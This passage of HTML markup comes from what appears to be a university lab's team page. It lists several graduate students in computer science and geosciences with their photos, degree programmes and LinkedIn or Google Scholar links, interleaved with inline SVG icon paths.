11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://scholar.google.com/citations?user=Cwt8OwkAAAAJ&amp;hl=en\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1341.797 166.992c14.648 0 23.438 5.859 23.438 11.719 2.93 8.789 2.93 17.578 2.93 29.297v503.906c0 11.719-5.859 20.508-11.719 29.297-8.789 8.789-17.578 11.719-29.297 11.719h-17.578c-11.719 0-20.508-5.859-29.297-11.719-8.789-8.789-11.719-17.578-11.719-29.297v-503.906c0-11.719 0-20.508 0-29.297 2.93-5.859 8.789-11.719 23.438-11.719v-67.383l-219.727 181.641c2.93 2.93 2.93 5.859 5.859 5.859 0 2.93 2.93 2.93 2.93 5.859 8.789 17.578 17.578 38.086 23.438 58.594 2.93 20.508 5.859 46.875 5.859 73.242 0 20.508 0 38.086-2.93 55.664s-8.789 38.086-14.648 52.734c-8.789 14.648-14.648 29.297-23.438 43.945-8.789 11.719-17.578 23.438-26.367 32.227-8.789 11.719-20.508 20.508-29.297 29.297s-20.508 17.578-29.297 26.367c-8.789 8.789-17.578 17.578-26.367 26.367s-14.648 17.578-23.438 26.367c-5.859 8.789-11.719 17.578-14.648 26.367-2.93 11.719-2.93 20.508-2.93 29.297 0 11.719 0 20.508 5.859 29.297 2.93 8.789 8.789 20.508 20.508 29.297 8.789 8.789 17.578 20.508 29.297 29.297 8.789 8.789 20.508 20.508 35.156 29.297 11.719 8.789 26.367 17.578 38.086 29.297 11.719 8.789 26.367 20.508 38.086 32.227s23.438 23.438 35.156 38.086c11.719 17.578 20.508 32.227 29.297 49.805s14.648 38.086 17.578 55.664c5.859 20.508 8.789 41.016 8.789 61.523 0 29.297-2.93 55.664-11.719 82.031-5.859 26.367-17.578 49.805-32.227 70.313-14.648 23.438-32.227 43.945-49.805 61.523-20.508 20.508-41.016 35.156-61.523 49.805-26.367 11.719-49.805 26.367-73.242 35.156-26.367 8.789-49.805 17.578-79.102 23.438-23.438 5.859-49.805 11.719-79.102 14.648-26.367 2.93-52.734 5.859-79.102 5.859-14.648 0-32.227 0-49.805-2.93-14.648 0-32.227-2.93-49.805-5.859-14.648-2.93-32.227-5.859-49.805-8.789-17.578-5.859-35.156-11.719-49.805-17.578-17.578-5.859-35.156-11.719-49.805-20.508s-29.297-17.578-41.016-29.297c-14.648-8.789-26.367-20.508-35.156-32.227-11.719-11.719-20.508-26.367-29.297-41.016s-14.648-32.227-20.508-49.805c-2.93-14.648-5.859-32.227-5.859-52.734 0-23.438 2.93-43.945 8.789-64.453s14.648-41.016 29.297-61.523c11.719-17.578 26.367-35.156 43.945-52.734 14.648-14.648 35.156-29.297 55.664-41.016 17.578-11.719 38.086-20.508 61.523-32.227 20.508-8.789 46.875-14.648 76.172-23.438 29.297-5.859 58.594-11.719 90.82-14.648 32.227-5.859 70.313-8.789 108.398-11.719-17.578-23.438-29.297-43.945-38.086-64.453s-14.648-41.016-14.648-58.594c0-11.719 2.93-23.438 5.859-35.156s5.859-23.438 11.719-38.086c-8.789 0-17.578 2.93-29.297 2.93-8.789 0-17.578 0-26.367 0-43.945 0-79.102-5.859-114.258-17.578-35.156-14.648-67.383-32.227-93.75-61.523-29.297-26.367-49.805-58.594-64.453-90.82s-20.508-70.313-20.508-111.328c0-2.93 0-8.789 0-11.719 0-5.859 0-8.789 0-11.719h-339.844l506.836-439.453h834.961l-76.172 58.594v108.398zM922.852 1037.109c0-2.93-5.859-5.859-11.719-8.789-5.859-5.859-11.719-8.789-20.508-17.578-8.789-5.859-17.578-11.719-23.438-17.578-2.93-2.93-5.859-5.859-8.789-5.859s-8.789 0-14.648 0c-5.859 0-14.648-2.93-23.438-2.93-20.508 0-38.086 2.93-55.664 2.93-20.508 2.93-38.086 5.859-55.664 8.789s-38.086 8.789-55.664 14.648c-17.578 5.859-35.156 11.719-52.734 17.578-17.578 8.789-32.227 17.578-49.805 29.297-11.719 11.719-26.367 23.438-35.156 38.086-11.719 14.648-20.508 32.227-26.367 49.805s-8.789 35.156-8.789 55.664c0 20.508 2.93 38.086 8.789 55.664 2.93 14.648 11.719 32.227 23.438 46.875 8.789 14.648 20.508 29.297 32.227 38.086 14.648 11.719 29.297 23.438 43.945 29.297 14.648 8.789 29.297 17.578 46.875 23.438s32.227 11.719 49.805 14.648c20.508 5.859 38.086 8.789 52.734 8.789 20.508 2.93 38.086 2.93 52.734 2.93 38.086 0 70.313-2.93 99.609-11.719 32.227-5.859 58.594-17.578 84.961-35.156s43.945-35.156 55.664-61.523c14.648-26.367 20.508-52.734 20.508-87.891 0-5.859 0-11.719-2.93-20.508 0-5.859 0-11.719-2.93-20.508s-5.859-14.648-5.859-20.508c-2.93-5.859-5.859-11.719-5.859-14.648-2.93-5.859-5.859-11.719-8.789-17.578s-8.789-11.719-14.648-17.578c-5.859-8.789-8.789-11.719-14.648-17.578s-8.789-8.789-11.719-11.719c-2.93-2.93-5.859-5.859-11.719-11.719-2.93-5.859-11.719-11.719-17.578-17.578-8.789-8.789-14.648-11.719-20.508-17.578-5.859 2.93-8.789 0-11.719 0zM911.133 641.602c11.719-14.648 23.438-35.156 32.227-58.594s11.719-46.875 11.719-70.313c0-23.438-2.93-46.875-5.859-70.313-5.859-23.438-8.789-46.875-17.578-73.242-8.789-23.438-17.578-46.875-32.227-70.313-11.719-20.508-26.367-41.016-43.945-61.523s-38.086-35.156-58.594-43.945c-17.578-11.719-41.016-14.648-64.453-14.648-26.367 0-49.805 2.93-70.313 14.648-17.578 8.789-35.156 23.438-49.805 41.016-14.648 20.508-23.438 38.086-32.227 61.523-5.859 23.438-8.789 49.805-8.789 76.172 0 23.438 0 46.875 5.859 70.313 2.93 20.508 8.789 43.945 14.648 70.313 8.789 23.438 17.578 43.945 32.227 67.383 11.719 20.508 26.367 38.086 43.945 58.594 17.578 17.578 38.086 32.227 58.594 41.016s41.016 14.648 64.453 14.648c26.367 0 49.805-5.859 70.313-14.648 17.578-5.859 35.156-20.508 49.805-38.086z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-848-outer style-local-182-c87-outer\">\n            <div data-colibri-id=\"182-c87\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-848 style-local-182-c87 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c88\" class=\"d-block style-854 style-local-182-c88 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2023/09/cropped-cropped-anupam-e1697206626249.jpg\" class=\"wp-image-1747 style-854-image style-local-182-c88-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-854-frameImage style-local-182-c88-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c89\" class=\"h-global-transition-all h-heading style-850 style-local-182-c89 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-850 style-local-182-c89\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Anupam Sarker</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c90\" class=\"h-text h-text-component style-851 style-local-182-c90 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>PhD Student\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c91\" class=\"h-text h-text-component style-902 style-local-182-c91 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science</p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c92\" class=\"style-855 style-local-182-c92 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/anupam-sarker-b164b412a\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-848-outer style-local-182-c93-outer\">\n            <div data-colibri-id=\"182-c93\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-848 style-local-182-c93 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c94\" class=\"d-block style-854 style-local-182-c94 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-cropped-Ardavan-e1697206676649.jpg\" class=\"wp-image-1748 style-854-image style-local-182-c94-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-854-frameImage style-local-182-c94-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c95\" class=\"h-global-transition-all h-heading style-850 style-local-182-c95 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-850 style-local-182-c95\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Ardavan Sassini</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c96\" class=\"h-text h-text-component style-851 style-local-182-c96 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>PhD Student\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c97\" class=\"h-text h-text-component style-902 style-local-182-c97 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c98\" class=\"style-855 style-local-182-c98 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/ardavansassani\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-848-outer style-local-182-c99-outer\">\n            <div data-colibri-id=\"182-c99\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-848 style-local-182-c99 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c100\" class=\"d-block style-854 style-local-182-c100 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/04/cropped-cropped-cropped-Jean-e1697206801281.jpg\" class=\"wp-image-1750 style-854-image style-local-182-c100-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-854-frameImage style-local-182-c100-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c101\" class=\"h-global-transition-all h-heading style-850 style-local-182-c101 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-850 style-local-182-c101\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Jean Guo</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c102\" class=\"h-text h-text-component style-851 style-local-182-c102 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Ph.D. Student</p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c103\" class=\"h-text h-text-component style-902 style-local-182-c103 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science\n                      <br>\n                    </p>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-848-outer style-local-182-c104-outer\">\n            <div data-colibri-id=\"182-c104\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-848 style-local-182-c104 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c105\" class=\"d-block style-854 style-local-182-c105 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-cropped-Basit-e1697206890221.jpg\" class=\"wp-image-1752 style-854-image style-local-182-c105-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-854-frameImage style-local-182-c105-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c106\" class=\"h-global-transition-all h-heading style-850 style-local-182-c106 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-850 style-local-182-c106\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Basit Damilare Amuda</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c107\" class=\"h-text h-text-component style-851 style-local-182-c107 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Master\'s Student\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c108\" class=\"h-text h-text-component style-902 style-local-182-c108 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Geosciences</p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c109\" class=\"style-855 style-local-182-c109 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"http://linkedin.com/in/basit-amuda-227098238\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-848-outer style-local-182-c110-outer\">\n            <div data-colibri-id=\"182-c110\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-848 style-local-182-c110 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c111\" class=\"d-block style-854 style-local-182-c111 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2023/09/cropped-cropped-sara-edwards1-e1697206932891.jpg\" class=\"wp-image-1754 style-854-image style-local-182-c111-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-854-frameImage style-local-182-c111-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c112\" class=\"h-global-transition-all h-heading style-850 style-local-182-c112 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-850 style-local-182-c112\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Sara Edwards</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c113\" class=\"h-text h-text-component style-851 style-local-182-c113 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Master\'s Student\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c114\" class=\"h-text h-text-component style-902 style-local-182-c114 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c115\" class=\"style-855 style-local-182-c115 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/sara-edwards-691b8331/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-848-outer style-local-182-c116-outer\">\n            <div data-colibri-id=\"182-c116\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-848 style-local-182-c116 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c117\" class=\"d-block style-854 style-local-182-c117 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/04/cropped-cropped-cropped-cropped-Ryan-e1697207029774.jpg\" class=\"wp-image-1756 style-854-image style-local-182-c117-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-854-frameImage style-local-182-c117-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c118\" class=\"h-global-transition-all h-heading style-850 style-local-182-c118 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-850 style-local-182-c118\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Ryan Garland</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c119\" class=\"h-text h-text-component style-851 style-local-182-c119 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Master\'s Student\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c120\" class=\"h-text h-text-component style-902 style-local-182-c120 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c121\" class=\"style-855 style-local-182-c121 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/ryan-g-aa71a0163\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 